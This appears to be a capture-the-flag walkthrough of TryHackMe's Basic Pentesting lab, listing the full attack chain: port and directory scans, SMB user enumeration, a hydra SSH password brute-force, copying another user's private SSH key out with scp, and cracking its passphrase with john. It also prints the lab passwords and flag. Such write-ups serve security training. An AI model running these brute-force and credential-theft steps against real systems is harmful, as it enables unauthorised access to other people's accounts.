tryhackme // 2024-12-30 // ID: REF-Basic Pentesting

Basic Pentesting

Target: 10.201.52.181

Summary

Walkthrough of the Basic Pentesting lab based on the commands and outputs you provided. Steps: reconnaissance (nmap, gobuster), SMB enumeration (enum4linux), password cracking (hydra), user access (ssh), local enumeration (linpeas), extracting an SSH private key, cracking the key passphrase with ssh2john + john, and logging in as the target user to read pass.bak.

Reconnaissance

Nmap (initial scan)

Command used:

nmap -sC -sV -oN nmap/initials 10.201.52.181

Selected output (truncated):

Nmap scan report for 10.201.52.181
Host is up (0.40s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.41 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 4
445/tcp  open  netbios-ssn Samba smbd 4
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Notes: SSH (22), HTTP (80/8080), SMB (139/445) and AJP (8009) are available — these are the obvious attack surface points.

Web enumeration (gobuster)

Command used:

gobuster dir -u http://10.201.52.181/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Result (found):

/development          (Status: 301) [Size: 320] [--> http://10.201.52.181/development/]

Visiting /development/ revealed two files: dev.txt and j.txt (per your notes). j.txt indicated a weak password for the jan user.

SMB / Windows-like enumeration (enum4linux)

Command used:

./enum4linux.pl -a 10.201.52.181 | tee enum4linux.log

Key findings (extracted from the output):

Workgroup/Domain: WORKGROUP
Server: Samba 4.15.13-Ubuntu
Shares: Anonymous (accessible)
Password policy: minimum length 5, complexity disabled
Local users enumerated (via RID cycling): kay, jan, ubuntu

This confirms the usernames jan and kay referenced earlier in the web files.

Password brute-force (hydra)

Command used (as provided):

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.201.54.30

Hydra output (relevant line):

[22][ssh] host: 10.201.54.30   login: jan   password: armando

Note: the hydra run showed 10.201.54.30 as the target in the logged output. Preserve the exact output as observed: jan:armando was found and used to SSH in.

ssh jan@10.201.54.30
# password: armando

Local enumeration and finding the SSH key

After SSH'ing as jan, you uploaded and ran linpeas (or equivalent) via scp to perform local enumeration. That revealed a private key belonging to kay in their home directory (the file you saved locally was named 0d_rsa in your notes).

Steps summarized:

# from attacker machine
scp linpeas.sh jan@10.201.54.30:/tmp/
ssh jan@10.201.54.30
# run linpeas and look for interesting files
# found /home/kay/.ssh/id_rsa (saved locally as 0d_rsa)
scp jan@10.201.54.30:/home/kay/.ssh/id_rsa ./0d_rsa

Cracking the private key passphrase (ssh2john + john)

Convert the private key to a john-compatible hash:

python3 /usr/share/john/ssh2john.py 0d_rsa > id_rsa.hash

Crack with john using rockyou.txt:

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash

john output (relevant):

beeswax          (0d_rsa)

Passphrase recovered for the SSH private key: beeswax.

SSH into Kay and capture the flag

Use the private key and the recovered passphrase to SSH to Kay's account:

ssh -i 0d_rsa kay@10.201.54.30
# when prompted for passphrase: beeswax

Once logged in as kay you read the pass.bak file:

cat pass.bak
-> heresareallystrongpasswordthatfollowsthepasswordpolicy$$

You now have the password string contained in pass.bak (user flag / secret for this box).

Notes & observations

Pay attention to small IP mismatches in logged outputs (your initial target was 10.201.52.181, but some tools show 10.201.54.30). Keep exact command output as recorded — the walkthrough reflects the commands and outputs you provided.
Weak password on jan made initial access trivial via hydra + rockyou.txt.
linpeas quickly found the SSH private key for kay. Always check home directories and .ssh directories during post-exploitation.
ssh2john.py + john is a common pattern for cracking encrypted OpenSSH private keys; remember to use an appropriate wordlist.

Commands summary (copy/paste)

# Recon
nmap -sC -sV -oN nmap/initials 10.201.52.181

gobuster dir -u http://10.201.52.181/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# SMB/enum
./enum4linux.pl -a 10.201.52.181 | tee enum4linux.log

# Password cracking (as run)
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.201.54.30

# After getting jan access
scp linpeas.sh jan@10.201.54.30:/tmp/
ssh jan@10.201.54.30
# find the key and copy it out
scp jan@10.201.54.30:/home/kay/.ssh/id_rsa ./0d_rsa

# Convert and crack private key
python3 /usr/share/john/ssh2john.py 0d_rsa > id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash

# SSH to kay
ssh -i 0d_rsa kay@10.201.54.30
# passphrase: beeswax
cat pass.bak